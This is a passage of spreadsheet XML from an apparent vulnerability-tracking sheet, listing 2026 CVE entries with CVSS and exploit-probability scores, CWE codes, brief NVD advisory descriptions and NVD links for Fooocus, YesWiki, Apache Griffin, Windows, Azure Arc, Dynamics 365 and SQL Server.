        <v>0.004</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr"/>
      <c r="Q233" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>An eval() injection vulnerability in the get_list function in modules/meta_parser.py in lllyasviel Fooocus 2.1.854 through 2.5.5 allows remote attackers to execute arbitrary Python code via a crafted styles payload in the EXIF metadata of an uploaded image file.</t>
        </is>
      </c>
      <c r="S233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51974</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52691</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr"/>
      <c r="Q234" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Griffin Hive Metastore Module. 
This issue affects Apache Griffin Hive Metastore Module: all versions.
As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="S234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52691</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52775</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr"/>
      <c r="Q235" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki through the latest development branch contains a SQL injection vulnerability in ReactionManager::deleteUserReaction() that allows any authenticated user to inject arbitrary SQL via the {idreaction} and {id} URL path parameters. The parameters are concatenated directly into a SQL LIKE clause without escaping or parameterization. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52775</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55521</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr"/>
      <c r="Q236" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R236"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S236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55521</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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37" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr"/>
      <c r="Q237" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62744</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr"/>
      <c r="Q238" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62895</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr"/>
      <c r="Q239" s="5" t="inlineStr">
        <is>
          <t>CWE-1390, CWE-89, CWE-942</t>
        </is>
      </c>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65772</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr"/>
      <c r="Q240" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K241" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr"/>
      <c r="Q241" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr"/>
      <c r="Q242" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K243" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr"/>
      <c r="Q243" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K244" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr"/>
      <c r="Q244" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67368</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K245" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr"/>
      <c r="Q245" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr"/>
      <c r="Q246" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr"/>
      <c r="Q247" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr"/>
      <c r="Q248" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K249" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr"/>
      <c r="Q249" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K250" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L250" s="5" t="inlineStr"/>
